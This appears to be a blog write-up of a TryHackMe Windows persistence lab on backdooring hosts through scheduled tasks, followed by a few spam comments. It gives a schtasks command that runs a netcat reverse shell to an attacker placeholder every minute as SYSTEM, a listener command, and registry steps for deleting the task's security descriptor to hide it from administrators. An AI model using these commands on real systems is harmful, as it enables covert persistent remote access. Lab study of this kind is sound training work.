In this post, we covered part 4 of Windows Persistence Techniques and particularly we covered scheduled tasks as part of TryHackMe win local persistence.
The most common way to schedule tasks is using the built-in Windows task scheduler. The task scheduler allows for granular control of when your task will start, allowing you to configure tasks that will activate at specific hours, repeat periodically or even trigger when specific system events occur. From the command line, you can use schtasks
to interact with the task scheduler. A complete reference for the command can be found on Microsoft’s website.
Understanding Scheduled Tasks for Persistence
I learned that scheduled tasks in Windows are pretty much like cron jobs in Linux. They let you run programs or scripts automatically at specific times or intervals. I can totally use this to my advantage by scheduling a payload to run regularly, essentially creating a backdoor. The key things I need to consider when making a backdoor task are:
- Payload: This is the actual code or program the task will execute. It could be anything from a PowerShell script, an executable, Python code, or even simple Windows commands.
- Date/Time: I need to set when and how often the task runs. It’s smarter to run it less frequently, like daily at startup, to avoid raising suspicion, rather than every few minutes.
- User: To get the highest privileges, I’ll definitely want the task to run as the
SYSTEM
user.
Hiding the Scheduled Task
The video emphasized that a smart system administrator auditing scheduled tasks would likely spot a suspicious new one. To avoid detection, I can hide the task. This is done by messing with its Security Descriptor (SD). Think of the SD as an access control list that decides who can see or interact with the task. By deleting the SD from the registry, I can make the task invisible to everyone, including administrators, when they check the standard Task Scheduler interface. The task will still run, but it just won’t show up in the list!
Practical Steps and Commands
Here’s a breakdown of the steps I learned and the commands I’d use:
1. Creating the Scheduled Task
I’d use the schtasks.exe
command-line tool. For example, to create a task that runs Netcat every minute to connect back to my machine (the attacker) as the SYSTEM
user, I’d use:
Bash
schtasks.exe /create /sc minute /mo 1 /tn "Test Backdoor" /tr "C:\tools\nc.exe <MY_IP_ADDRESS> <PORT> -e cmd.exe" /ru system
/create
: Tells the system I’m creating a new task./sc minute
: Sets the schedule to run every minute./mo 1
: A modifier for/sc
, meaning “every 1 minute.”/tn "Test Backdoor"
: Names my task “Test Backdoor.”/tr "C:\tools\nc.exe <MY_IP_ADDRESS> <PORT> -e cmd.exe"
: This is the payload. It tells the task to runnc.exe
fromC:\tools
, connect to my IP address on a specific port, and executecmd.exe
when it connects./ru system
: Ensures the task runs under the powerfulSYSTEM
account.
2. Verifying the Task (Before Hiding)
Before making it disappear, I’d check if the task was created correctly:
Bash
schtasks.exe /query /tn "Test Backdoor"
3. Setting up a Listener
On my attacker machine, I’d set up a Netcat listener to catch the connection from the victim:
Bash
nc -lvp <PORT>
-l
: Listen mode.-v
: Verbose output.-p <PORT>
: Specifies the port to listen on, matching the one in the scheduled task payload.
4. Hiding the Task via Registry
To make the task invisible, I need to delete its Security Descriptor from the Windows Registry. First, I’d open the Registry Editor with system privileges, likely using PsExec
:
Bash
C:\tools\SysinternalsSuite\PsExec.exe -s -i regedit.exe
-s
: Runs the process asSYSTEM
.-i
: Runs it interactively.
Then, in regedit.exe
, I’d navigate to:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\
Under the Tree
key, I’d find the subkey for my task (e.g., “Test Backdoor”) and delete the SD
(Security Descriptor) value inside it.
5. Verifying the Task is Hidden
After deleting the SD, if I tried to query the task again using schtasks.exe /query /tn "Test Backdoor"
, it should say the system can’t find the file. Also, opening the graphical Task Scheduler (taskschd.msc
) wouldn’t show the task, even for an administrator. However, it’s worth noting that the task’s entry (without the SD) would still be visible in the registry path, so a very thorough administrator might still find it there.
Room Answers
Video Walk-through
Thank you very much for the information
Thank you for the information provided
Ꭲhanks a lot for shaгing this with all people you гeally know what you’re
speaking abߋut! Bookmarked. Kindly also diѕcuss with my website =).
We can have a link change agreement between us